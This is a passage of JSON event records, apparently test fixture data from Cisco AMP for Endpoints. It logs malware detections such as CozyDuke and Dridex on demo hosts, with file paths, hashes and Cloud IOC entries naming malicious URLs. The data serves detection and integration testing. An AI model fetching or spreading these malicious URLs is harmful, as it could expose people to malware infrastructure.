Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1443112390223000800,"timestamp":1610704898,"timestamp_nanoseconds":965000000,"date":"2021-01-15T10:01:38+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610704898,"start_date":"2021-01-15T10:01:38+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CryptoWall","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"ce:32:02:72:9b:c8"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Accessed URL matches characteristics of several malware families.","short_description":"GateDotPhp.ioc"},"network_info":{"dirty_url":"http://flashtamp.info/datas/gate.php","parent":{"disposition":"Clean","identity":{"sha256":"72c027273297ccf2f33f5b4c5f5bce3eecc69e5f78b6bbc1dec9e58780a6fd02"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1443112389350000600,"timestamp":1610704885,"timestamp_nanoseconds":350000000,"date":"2021-01-15T10:01:25+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610704885,"start_date":"2021-01-15T10:01:25+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CryptoWall","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"ce:32:02:72:9b:c8"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Svchost.exe accessed a Wordpress URL - this is anomalous and indicative of a process injection.","short_description":"W32.SvchostHitWordpressURL.ioc"},"network_info":{"dirty_url":"http://laptopsinhvien.net/wp-content/plugins/better-wp-security/modules/free/brute-force/js/ap3.php?t=i3fktdvzoauf","parent":{"disposition":"Clean","identity":{"sha256":"cb2bc00985f641f9900aa0adc5fc203eaaf57394412dc4ce4b37222ef519205f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156208098324251000,"timestamp":1610704881,"timestamp_nanoseconds":90000000,"date":"2021-01-15T10:01:21+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156208098324250639","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292803669262000,"timestamp":1610704872,"timestamp_nanoseconds":682000000,"date":"2021-01-15T10:01:12+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Generic:CozyDukeB.18fx.1201","detection_id":"6156292803669262360","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"player.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\player.exe","identity":{"sha256":"01468b1d3e089985a4ed255b6594d24863cfd94a647329c631e4f4e52759f8a9"},"parent":{"process_id":3052,"disposition":"Malicious","file_name":"monkeys.swf.exe","identity":{"sha256":"7fd72a36f7e0e6e0a8bc777fc9ed41e0a6d5526c98bc95a09e189531cf7e70d5","sha1":"75aeaee253b5c8ae701195e3b0f49308f3d1d932","md5":"95b3ec0a4e539efaa1faa3d4e25d51de"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292803669262000,"timestamp":1610704872,"timestamp_nanoseconds":35000000,"date":"2021-01-15T10:01:12+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Generic:KCX.18fv.1201","detection_id":"6156292803669262359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"amdhcp32.dll","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\ATI_Subsystem\\amdhcp32.dll","identity":{"sha256":"37ceea0922d1177a9de74f4858678acf6afd22706489fcca35a509bca9688cb7","sha1":"00f67deb6e435c68f8a39336c9effc45d395b134","md5":"6761106f816313394a653db5172dc487"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292803669262000,"timestamp":1610704872,"timestamp_nanoseconds":33000000,"date":"2021-01-15T10:01:12+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.0DC7438BE5-100.SBX.VIOC","detection_id":"6156292803669262356","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"aticaldd.dll","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\ATI_Subsystem\\aticaldd.dll","identity":{"sha256":"0dc7438be5b21a36651de0a08361b18d76f0920517a7d51f75dc234740f392ca","sha1":"42cfe068b0f476198b93393840d400424fd77f0c","md5":"d596827d48a3ff836545b3a999f2c3e3"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292803669262000,"timestamp":1610704872,"timestamp_nanoseconds":27000000,"date":"2021-01-15T10:01:12+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6156292803669262358","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"player.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\player.exe","identity":{"sha256":"01468b1d3e089985a4ed255b6594d24863cfd94a647329c631e4f4e52759f8a9"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292803669262000,"timestamp":1610704872,"timestamp_nanoseconds":13000000,"date":"2021-01-15T10:01:12+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6156292803669262357","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"player.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\player.exe","identity":{"sha256":"01468b1d3e089985a4ed255b6594d24863cfd94a647329c631e4f4e52759f8a9"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292799374295000,"timestamp":1610704871,"timestamp_nanoseconds":984000000,"date":"2021-01-15T10:01:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Generic:Cozer.18fv.1201","detection_id":"6156292799374295059","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"atiumdag.dll","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\ATI_Subsystem\\atiumdag.dll","identity":{"sha256":"8853979fce0f767b495abd55b696203209e95f04aaefe16c52c1724d07972154","sha1":"883292f00e5836f99a1943a6e0164d8c6c124478","md5":"bc626c8f11ed753f33ad1c0fe848d898"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292799374295000,"timestamp":1610704871,"timestamp_nanoseconds":942000000,"date":"2021-01-15T10:01:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Generic:KCX.18fv.1201","detection_id":"6156292799374295058","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"player.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\player.exe","identity":{"sha256":"01468b1d3e089985a4ed255b6594d24863cfd94a647329c631e4f4e52759f8a9"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292799374295000,"timestamp":1610704871,"timestamp_nanoseconds":937000000,"date":"2021-01-15T10:01:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.0DC7438BE5-100.SBX.VIOC","detection_id":"6156292799374295057","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"player.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\player.exe","identity":{"sha256":"01468b1d3e089985a4ed255b6594d24863cfd94a647329c631e4f4e52759f8a9"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292799374295000,"timestamp":1610704871,"timestamp_nanoseconds":931000000,"date":"2021-01-15T10:01:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Generic:Cozer.18fv.1201","detection_id":"6156292799374295056","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"player.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\player.exe","identity":{"sha256":"01468b1d3e089985a4ed255b6594d24863cfd94a647329c631e4f4e52759f8a9"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292799374295000,"timestamp":1610704871,"timestamp_nanoseconds":917000000,"date":"2021-01-15T10:01:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Generic:CozyDukeB.18fx.1201","detection_id":"6156292799374295055","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"player.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\player.exe","identity":{"sha256":"01468b1d3e089985a4ed255b6594d24863cfd94a647329c631e4f4e52759f8a9"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292799374295000,"timestamp":1610704871,"timestamp_nanoseconds":863000000,"date":"2021-01-15T10:01:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Generic:CozyDukeB.18fx.1201","detection_id":"6156292799374295054","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"player.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\player.exe","identity":{"sha256":"01468b1d3e089985a4ed255b6594d24863cfd94a647329c631e4f4e52759f8a9"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292799374295000,"timestamp":1610704871,"timestamp_nanoseconds":776000000,"date":"2021-01-15T10:01:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Generic:CozyDukeB.18fx.1201","detection_id":"6156292799374295053","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"player.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\player.exe","identity":{"sha256":"01468b1d3e089985a4ed255b6594d24863cfd94a647329c631e4f4e52759f8a9"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292799374295000,"timestamp":1610704871,"timestamp_nanoseconds":767000000,"date":"2021-01-15T10:01:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Generic:CozyDukeB.18fx.1201","detection_id":"6156292799374295052","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"player.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\player.exe","identity":{"sha256":"01468b1d3e089985a4ed255b6594d24863cfd94a647329c631e4f4e52759f8a9"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292799374295000,"timestamp":1610704871,"timestamp_nanoseconds":762000000,"date":"2021-01-15T10:01:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Generic:CozyDukeB.18fx.1201","detection_id":"6156292799374295051","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"player.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\player.exe","identity":{"sha256":"01468b1d3e089985a4ed255b6594d24863cfd94a647329c631e4f4e52759f8a9"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292799374295000,"timestamp":1610704871,"timestamp_nanoseconds":757000000,"date":"2021-01-15T10:01:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Generic:CozyDukeB.18fx.1201","detection_id":"6156292799374295050","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"player.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\player.exe","identity":{"sha256":"01468b1d3e089985a4ed255b6594d24863cfd94a647329c631e4f4e52759f8a9"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292799374295000,"timestamp":1610704871,"timestamp_nanoseconds":711000000,"date":"2021-01-15T10:01:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Generic:CozyDukeB.18fx.1201","detection_id":"6156292799374295049","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"player.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\player.exe","identity":{"sha256":"01468b1d3e089985a4ed255b6594d24863cfd94a647329c631e4f4e52759f8a9"},"parent":{"process_id":3052,"disposition":"Malicious","file_name":"monkeys.swf.exe","identity":{"sha256":"7fd72a36f7e0e6e0a8bc777fc9ed41e0a6d5526c98bc95a09e189531cf7e70d5","sha1":"75aeaee253b5c8ae701195e3b0f49308f3d1d932","md5":"95b3ec0a4e539efaa1faa3d4e25d51de"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955900023001000,"timestamp":1610704869,"timestamp_nanoseconds":23000000,"date":"2021-01-15T10:01:09+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"W32.GenericKD:CozyDukeB.18f0.1201","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610704869,"start_date":"2021-01-15T10:01:09+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"7fd72a36f7e0e6e0a8bc777fc9ed41e0a6d5526c98bc95a09e189531cf7e70d5"},"parent":{"disposition":"Clean","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292782194426000,"timestamp":1610704867,"timestamp_nanoseconds":497000000,"date":"2021-01-15T10:01:07+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Generic:CozyDukeB.18fx.1201","detection_id":"6156292782194425864","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"monkeys.swf.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Downloads\\monkeys\\monkeys.swf.exe","identity":{"sha256":"7fd72a36f7e0e6e0a8bc777fc9ed41e0a6d5526c98bc95a09e189531cf7e70d5","sha1":"75aeaee253b5c8ae701195e3b0f49308f3d1d932","md5":"95b3ec0a4e539efaa1faa3d4e25d51de"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156208033899741000,"timestamp":1610704866,"timestamp_nanoseconds":800000000,"date":"2021-01-15T10:01:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156208033899741198","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292777899459000,"timestamp":1610704866,"timestamp_nanoseconds":500000000,"date":"2021-01-15T10:01:06+00:00","event_type":"Threat 